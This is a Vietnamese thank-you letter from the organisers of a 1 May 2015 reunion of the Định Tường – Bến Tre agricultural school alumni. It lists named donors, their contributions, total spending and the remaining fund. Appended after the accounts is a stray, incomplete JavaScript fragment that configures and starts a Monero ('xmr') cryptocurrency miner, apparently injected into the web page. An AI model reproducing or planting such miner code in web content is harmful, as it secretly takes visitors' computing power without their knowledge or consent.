Thư Cảm Ơn về buổi họp mặt ngày 1-5-2015 BLLNLS ĐT - BT

Thư Cảm Ơn

Ban tổ chức ngày họp mặt 1-5-2015 Trường Nông Lâm Súc Định Tường – Bến Tre

     Chân thành cảm ơn quý Đại Biểu, quý Thầy cô cùng tất cả các anh chị em trong và ngoài nước đã đóng góp tiền tài, công sức để buổi họp mặt thành công tốt đẹp. Mong rằng tình cảm của Đại gia đình Nông Lâm Súc chúng ta mãi bền vững.

      Trong quá trình tổ chức có gì sơ sót xin quý thầy cô và các bạn thông cảm bỏ qua.

Trân trọng.

Danh Sách Quý Thầy Cô và các anh chị em đóng góp cho ngày 1-5-2015:

 

1.      Lê Thị Giỏi k3                                                                       500.000 đồng

2.      Thân Thị Kiều Nhi k2                                                            200.000 đồng

3.      Thầy Nguyễn Tông Lộc                                                      5.000.000 đồng

4.      Lâm Thị Trọn k2                                                                    500.000 đồng

5.      Phan Hồng Vân k2                                                              2.000.000 đồng

6.      Kiều Văn Xương k1                                                            1.000.000 đồng

7.      Trần Thị Chắn k2                                                                   500.000 đồng

8.      Trần Thị Tuyết k2                                                                   500.000 đồng

9.      Nguyễn Văn Mới k3                                                               500.000 đồng

10.  Bùi Minh Đức k6                                                                      100.000 đồng

11.  Mai Tấn Tường  k5                                                                   500.000 đồng

12.  Chị Phượng k3                                                                       1.000.000 đồng

13.  Huỳnh Thị Tuyết Nga k3                                                                 100 USD

14.  Nguyễn Hữu Hưởng k2                                                          1.000.000 đồng

15.  Ông Bà Võ Văn Ninh ĐH Nông Lâm                                        500.000 đồng

16.  Trần Văn Diên nhà thơ NLS Cần Thơ                                    1.000.000 đồng

17.  Dương Xuân Triều NLS BL                                                       500.000 đồng

18.  Hàn Đức Thanh k3                                                                  1.000.000 đồng

19.  Nguyễn Công Trực k2                                                                500.000 đồng

20.  Lâm Văn Anh k3                                                                        500.000 đồng

21.  Thầy Bính, trường PT Tân Tỉnh TPMT                                          200.000 đồng

22.  Khóa 6                                                                                         500.000 đồng

23.  Nhóm Ái hữu NLS Bình Dương                                                  500.000 đồng

24.  Phạm Công Quyền NLS Chợ Gạo – NLS Bến Tre                   2.000.000 đồng

25.  Vũ Văn Sơn k3                                                                             500.000 đồng

26.  Việt Minh Dũng k1                                                                       400.000 đồng

27.  Nguyễn Hữu Châu k5                                                                   500.000 đồng

28.  Lâm Thành Phước k2                                                                   200.000 đồng

29.  Lâm Hoàng Thọ k2                                                                       200.000 đồng

30.  Cô Nguyễn Hồng Loan NLS Ninh Thuận                                     500.000 đồng

31.  Nguyễn Văn Bình k3                                                                     500.000 đồng

32.  Huỳnh Hữu Mẫn k4                                                                       200.000 đồng

33.  Trần Văn Lộc k2                                                                            500.000 đồng

34.  Nguyễn Văn Phát k1                                                                   1.000.000 đồng

35.  Phan Thanh Viên k5                                                                    2.000.000 đồng

36.  Phạm Bình Hòa k5                                                                      1.000.000 đồng

37.  Nguyễn Văn Ngàn k1                                                                     500.000 đồng

38.  Nguyễn Thị Thu Liên k2                                                                500.000 đồng

39.  Lê Văn Trung k3                                                                            500.000 đồng

40.  Hồ Ngọc Thanh k3                                                                         400.000 đồng

41.  Thầy Nguyễn Vinh Bé                                                                 1.000.000 đồng

42.  Nguyễn Thị Nga k2                                                                        200.000 đồng

43.  Nguyễn Văn Bon k2                                                                       300.000 đồng

44.  Võ Văn Một k2                                                                               200.000 đồng

45.  Lê Hoàng Phúc + Hương k3                                                           200.000 đồng

46.  Trường NLS Kiến Phong                                                                 500.000 đồng

Và số tiền bỏ vào thùng không ghi tên , tổng cộng tất cả :               40.000.000 đồng

Tổng chi cho ngày 1-5-2015:                                                              33.762.000 đồng

Còn tồn quỹ:                                                                                         6.238.000 đồng

Quỹ trước ngày 1-5-2015                                                                    3.039.000 đồng

Tồn quỹ Tổng cộng                                                                              9.377.000 đồng

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();